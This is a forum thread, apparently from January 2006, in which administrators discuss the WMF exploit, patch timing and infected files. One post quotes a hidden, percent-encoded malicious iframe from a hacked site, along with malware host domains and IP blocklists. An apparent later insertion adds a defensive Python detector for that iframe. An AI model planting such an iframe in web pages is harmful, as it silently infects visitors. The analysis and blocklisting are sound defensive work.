
Thread: ** HEADS UP ** IE vulnerability. EXTREMELY CRITICAL.

#121 AO Ancient: Team Leader (joined Oct 2002, 5,197 posts)
    I use the Bleeding Snort rules coupled with the DNS blackhole list... The combination keeps me pretty clean from spyware.... I'm not so happy about the WMF threat though and my users are getting pissy... I just sent them all this:-

    For those of you interested in why I am messing up your life so badly. Non-MyCompany staff may or may not wish to forward this to all their users as an explanation of the current situation.

    This is quite long. For those who can't be bothered to read my lengthy emails the short version is "We are potentially [Insert your expletive of choice here]. This is big, it affects both your work and your home computers. Take precautions or be a part of the problem - worse yet suffer the worst the attackers want to do to you". The un-interested people may tune out and go back to their normal business.....

    I _absolutely_ trust the good people at the Internet Storm Center. They are well-known people in the computer security world. They are trusted worldwide by people who are far better at this stuff than me.

    We are going through all these gyrations and inconvenience because what they have been saying over the last ten days mirrors what I have been thinking. They have made it quite clear today. I quote from their web site.

    _____________________________________
    "Are you ready to battle a large virus/worm outbreak? Please don't view
    this as a prediction that there will be a large event, but let me just
    say that conditions are right for a big storm (WMF issue and the return
    of the Sober worm).

    Regarding the WMF issue, you have probably decided to either wait for
    the official Microsoft patch, or you are rolling out Ilfak's patch. But
    there is still about 6-10 days of risk here for a major worldwide event...

    1) There is a serious vulnerability in Microsoft operating systems.
    2) An official patch will not be available from Microsoft until Jan. 10.
    3) There are multiple propagation vectors: e-mail, instant messaging, web
    surfing, etc.
    4) Several different versions of the exploit are in the wild and are
    being actively used by criminal groups. All propagation methods are
    being used. As of Wednesday, Jan 4 20:15:00 UTC, our current poll
    indicates that 22% of respondents (340) have seen exploit attempts
    through one of the exploitation vectors.
    5) Tools to generate random files to exploit the vulnerability are
    publicly available. These tools may be used to evade anti-virus and
    IDS/IPS signatures.
    6) Anti-virus signatures and intrusion detection/prevention system
    signatures may only be able to catch the first generation of exploits.
    7) If an outbreak does occur, how are you going to sanitize laptops that
    were infected outside of your network before allowing them to connect
    to your internal network?"
    _______________________________
    The source of this text is at http://isc.sans.org/ for those who would like to read more - but it is technical and basically advice for people like myself.

    January 10th is a misleading date... The reality is that on January 10th Microsoft's web site will be overloaded so getting the patch will be nearly impossible. It will be, realistically, the 11th or 12th before my update servers actually have the patch. It will be the 13th/14th before your workstations have the patch - but, because of the way the system works, it will be the 14th at the earliest - most likely the 15th before I can seriously consider that machines that are in regular use are patched (yes, I know there is a weekend in there - I'm being optimistic). But then there are those computers in back rooms and offices where the worker only comes in weekly that will remain unpatched... They will remain a threat to the network until they are patched and will most likely be a threat for the first few hours they are used before they become invulnerable. This is why I have chosen to block access now and roll out the unofficial patch - it gives you some protection and it gives me a nice warm fuzzy feeling, which I like when I am scared - trust me.... ;-)

    Fix your home computers too with the link I have provided for you - you'll get the warm fuzzy feeling too....

    Lastly, don't think for one second that the bad guys aren't looking carefully at the patch and the exploitable module to see where they can continue their attack.....

    I love my job, happy new year, I love my job, happy new year, I love my job, happy new year..... ad infinitum.... :-0
    I think 5% will "get it"....
    Don't SYN us.... We'll SYN you.....
    "A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools." - Thucydides

#122
    I just sent an email to all our staff. This ain't fun.


#123 AO Ancient: Team Leader (joined Oct 2002, 5,197 posts)
    Thrilling....

    I've been working 0500-2000 for the last two days.... I'm too old for this ****... Show me the perp(s) and I will invite Nihil over with his arsenal for a few beers..... I'm sure he has something I can use too...
    Don't SYN us.... We'll SYN you.....
    "A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools." - Thucydides

#124
    I'll bring the .50 cal. with a fresh box of patches, grease and balls. Been wanting to do some shootin' anyway.


#125 AO Ancient: Team Leader (joined Oct 2002, 5,197 posts)
    This is the BS none of us need:-

    As a consequence, says Theriault, businesses should keep existing antivirus protection up to date and concentrate on blocking unsolicited mail while waiting for the Microsoft patch, as this may help to screen out attacks. They should encourage users to practice safe computing by only visiting reputable Web sites and taking care with what they download, she says.
    The last sentence is _utterly_ laughable..... She's an idiot.... How many servers serve advertisements to AO alone? Then let's look at MSN, Yahoo etc.... Yep, she's a complete wally!!!!

    Source
    Don't SYN us.... We'll SYN you.....
    "A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools." - Thucydides

#126 RoadClosed, Senior Member (joined Jun 2003, 3,834 posts)
    I've been working 0500-2000 for the last two days.... I'm too old for this ****... Show me the perp(s) and I will invite Nihil over with his arsenal for a few beers..... I'm sure he has something I can use too...
    That's why I love my current job. Those are rare, even though I took a 20 percent cut from my last job. Oh **** it's 5:16, WTF am I still doing here. For added safety I am forcing all computers off the network at 6pm tonight. So I can have a beer in peace.
    West of House
    You are standing in an open field west of a white house, with a boarded front door.
    There is a small mailbox here.

#127 Senior Member (joined Oct 2003, 707 posts)
    WMF Vulnerability Security Update

    This is quite interesting ....

    In our effort to put this security fix on a fast track, a pre-release version of the update was briefly and inadvertently posted on a security community site. There has been some discussion and pointers on subsequent sites to the pre-release code. We recommend that customers disregard the postings and continue to keep up to date with our latest information on the WMF issue at http://www.microsoft.com/technet/sec...y/912840.mspx.
    Anyone know where it was posted ???
    Operation Cyberslam
    "I've noticed that everybody that is for abortion has already been born." Author Unknown
    Microsoft Shared Computer Toolkit
    Proyecto Ututo EarthCam

#128
    I've now seen this in action on an infected web page.

    Now, I'll post real domains here because I trust you boys and girls to be CAREFUL with this stuff. Use Samspade for Windows or some other safe browser.

    Here's an infected site: www[dot]thirdgenerationbluegrassband[dot]com - the site itself has been hacked, so the exploit is nothing to do with the site owners.

    At the beginning of the HTML is an IFRAME:

    <iframe src= http:// do not click %77%77%77%2E%74%72%75%73%74%34%66%72%65%65%2E%77%73?id=index12 frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>
    That deobfuscates to http://www[dot]trust4free[dot]ws/?id=index12 (don't visit this site in a standard web browser!!). This looks like an innocent site in Japanese, hosted on 85.255.114.164 (Inhoster). At the bottom of the page is what appears to be some standard Stats4all tracking code (attached as a GIF because it's waaaay too dangerous to post here)... but the tracking code refers to stats4all.cc which is not the correct URL, and is actually 85.255.114.163 (Inhoster again). Somewhere hidden in the Javascript is a call to load the infected file. (A quick Google search indicates that stats4all.ws is also suspect).

    I almost missed the fake stats4all code, and I'm not going to muck around with it on a Windows PC. The IPs square nicely with the ISC recommended blocklist at http://isc.sans.org/diary.php?storyid=997

    InterCage Inc.: 69.50.160.0/19 (69.50.160.0 - 69.50.191.255)
    Inhoster: 85.255.112.0/20 (85.255.112.0 - 85.255.127.255)
    This is the same exploit that hit the knoppix-std.org site. A bit of Googling for stats4all.cc and trust4free.ws indicates that this has been going on since at least 18th December 2005, so more than a week before it became public knowledge.

    To protect yourself against this particular threat from this particular source, I'd recommend applying the ISC blocklist. Also consider blocking access to .biz, .cc and .ws domains temporarily.

    There are many other vectors for this thing to come in on though, so even if you block this particular common attack you're still potentially vulnerable to others.
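The percent-encoded iframe and the ISC blocklist check described in this post, worked through as an added example. This is editor's code, not the poster's and not anything from the sites named above. It assumes the quoted iframe's hostname re-joined into one src value (the post broke it up with "do not click"), uses the two ISC ranges and the three TLDs the post mentions, and replaces DNS with a constructed lookup table holding the two addresses the post reports, so that it runs offline; the `<script>` tag pointing at stats4all.cc is constructed sample HTML, not the real page content.

```python
import ipaddress
import re
from urllib.parse import unquote, urlsplit

# Constructed sample page: the percent-encoded iframe quoted in the post,
# re-joined into one src value, plus a constructed <script> pointing at the
# fake stats4all.cc host. Not the real page content.
SAMPLE_HTML = (
    "<html><body>"
    "<iframe src=http://%77%77%77%2E%74%72%75%73%74%34%66%72%65%65%2E%77%73?id=index12 "
    'frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>'
    "<p>Third Generation Bluegrass Band</p>"
    '<script src="http://stats4all.cc/"></script>'
    "</body></html>"
)

# The two ISC blocklist ranges quoted in the post.
BLOCKLIST = [
    ipaddress.ip_network("69.50.160.0/19"),   # InterCage Inc.
    ipaddress.ip_network("85.255.112.0/20"),  # Inhoster
]

# TLDs the post suggests blocking temporarily.
SUSPICIOUS_TLDS = {"biz", "cc", "ws"}

# Constructed stand-in for DNS so the example runs offline, using the
# addresses the post reports for these hosts. For real use on an isolated
# analysis box, swap in socket.gethostbyname.
FAKE_DNS = {
    "www.trust4free.ws": "85.255.114.164",
    "stats4all.cc": "85.255.114.163",
}

TAG_RE = re.compile(r"<(?:iframe|script)\b[^>]*>", re.IGNORECASE)
# key=value, key="value" or key='value'; values may be unquoted, as in the sample.
ATTR_RE = re.compile(r"""\b([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def parse_attrs(tag):
    """Return a lowercase-keyed dict of the attributes inside one HTML start tag."""
    attrs = {}
    for m in ATTR_RE.finditer(tag):
        attrs[m.group(1).lower()] = next(g for g in m.groups()[1:] if g is not None)
    return attrs


def deobfuscate_host(url):
    """Percent-decode the whole URL before parsing: here the hostname itself is
    what was encoded, so urlsplit on the raw string would not see a real host."""
    host = urlsplit(unquote(url)).hostname
    return host.lower() if host else None


def in_blocklist(ip):
    """True if the address falls inside any of the quoted ISC ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in BLOCKLIST)


def analyze(html, resolve=FAKE_DNS.get):
    """Walk iframe/script tags and report the indicators the post describes:
    percent-encoded src, 1x1 hidden frame, suspicious TLD, blocklisted IP."""
    findings = []
    for m in TAG_RE.finditer(html):
        attrs = parse_attrs(m.group(0))
        src = attrs.get("src")
        if not src:
            continue
        host = deobfuscate_host(src)
        ip = resolve(host) if host else None
        findings.append({
            "raw_src": src,
            "host": host,
            "obfuscated": "%" in src,
            "hidden": attrs.get("width") == "1" and attrs.get("height") == "1",
            "suspicious_tld": bool(host) and host.rsplit(".", 1)[-1] in SUSPICIOUS_TLDS,
            "ip": ip,
            "blocklisted": ip is not None and in_blocklist(ip),
        })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_HTML):
        flags = [k for k in ("obfuscated", "hidden", "suspicious_tld", "blocklisted") if f[k]]
        print(f"{f['host']} -> {f['ip']}: {', '.join(flags) or 'no indicators'}")
```

Run it against saved HTML pulled with a non-rendering fetcher (the post's Samspade advice): the point of decoding before parsing is that a blocklist keyed on hostnames never sees `www.trust4free.ws` in the raw source, only the `%77%77%77...` string, which is exactly why the poster nearly missed the second hop.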

#129 brokencrow, Dissident 4dm1n (joined Feb 2004, Shawnee country, 1,243 posts)
    I'm trying to figure out the forensics on this exploit. On the 28th, I received the file xpladv470.wmf via email (I believe). Fortunately, I am currently using Opera for a mail client and webbrowsing. Opera prompted me to save the file to my hdd, so I put it in My Documents (I NEVER opened it). I was immediately suspicious of the file so I scanned it via Panda's online scan.

    Panda showed nothing. But nonetheless I remained leery of this file so I encrypted it to keep from being accidentally run. Two days later I scanned it again (after unencrypting it) via Panda and sure enough, it got picked up as an "Exploit/Metafile". I believe this is our .wmf exploit and am wondering if it's compromised that laptop. Any way of telling?

    I checked the date stamps on the shimgvw.dll and gdi32.dll files, and neither's been modified recently. Anything else I need to be checking?

    I run a number of computers, mostly old stuff. The laptop this has occurred on is a 'throwaway', an old Compaq running W2K, so I'm not too worried about cleaning it out.
    “Everybody is ignorant, only on different subjects.” — Will Rogers

#130 Junior Member (joined Jan 2002, 11 posts)
    FYI

    I just received word from our Microsoft Technical Account Manager that Microsoft is going to actually release MS06-001 TODAY at 2:00 PM Pacific Time. Yesterday our TAM told us that they would in no way consider releasing this patch "out of cycle" because they don't consider it a big threat.

    Put on your patching hats and pray that this doesn't break something else.
